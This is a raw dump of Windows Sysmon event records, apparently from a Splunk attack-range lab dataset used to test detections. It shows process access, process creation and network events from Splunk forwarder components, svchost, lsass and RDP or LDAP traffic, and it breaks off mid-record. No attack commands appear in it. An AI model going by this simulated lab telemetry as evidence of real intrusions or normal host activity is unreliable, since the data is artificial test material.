11:07:47.239{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219792Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:47.239{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219791Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:47.239{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219790Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:47.239{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1583-6216-D204-000000003902}432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219789Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:47.239{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1583-6216-D204-000000003902}432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219788Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:47.240{4F8D34B0-1583-6216-D204-000000003902}432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000219787Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:45.083{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx54630-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219786Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:47.176{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26DB01CE84B6F8565B5BA51930DFBE45,SHA256=DF5EEFF3E4988444F1D0530D3CA8BACB2E91B32A66AD105994A14706B63C3BEB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295683Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:45.589{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49265-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000295682Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:44.927{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49264-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000295681Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:44.927{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49264-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000295680Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:44.846{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49263-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000295679Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:44.846{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49263-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000295678Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:44.825{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49262-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49666- 354300x8000000000000000295677Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:44.825{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49262-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49666- 354300x8000000000000000295676Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:44.824{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49261-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000295675Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:44.824{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49261-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000295674Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:44.823{C8EA50B7-F11F-6215-0D00-000000003802}888C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49260-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local135epmap 354300x8000000000000000295673Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:44.822{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49260-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local135epmap 23542300x8000000000000000295685Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:48.698{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2176E90CEF153B51E6CCD55EA926A50C,SHA256=83AD10865F1E00F1B8D0FE26BA700D685508C5012EB2A8284859BB3F555EC578,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219816Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:48.317{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60CCE496F0F2696D2F303227DEFA0BF3,SHA256=2C284798D73896DC8C2059D90326D0EC8F1DF34C0F6C451B3C36DE8980B793B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295686Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:49.716{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03346405B1AD8526C72CAFDDCEB9868E,SHA256=A58C49B65F3FC8842945FB007F89A99D3A8251E726C9131E45792AD70B1B1D48,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000219845Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:49.926{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1585-6216-D504-000000003902}2712C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219844Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:49.926{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219843Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:49.926{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219842Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:49.926{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219841Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:49.926{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219840Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:49.926{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219839Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:49.926{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219838Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:49.926{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219837Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:49.926{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219836Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:49.926{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219835Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:49.926{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1585-6216-D504-000000003902}2712C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219834Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:49.926{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1585-6216-D504-000000003902}2712C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219833Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:49.927{4F8D34B0-1585-6216-D504-000000003902}2712C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000219832Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:49.426{4F8D34B0-1585-6216-D404-000000003902}11523508C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program 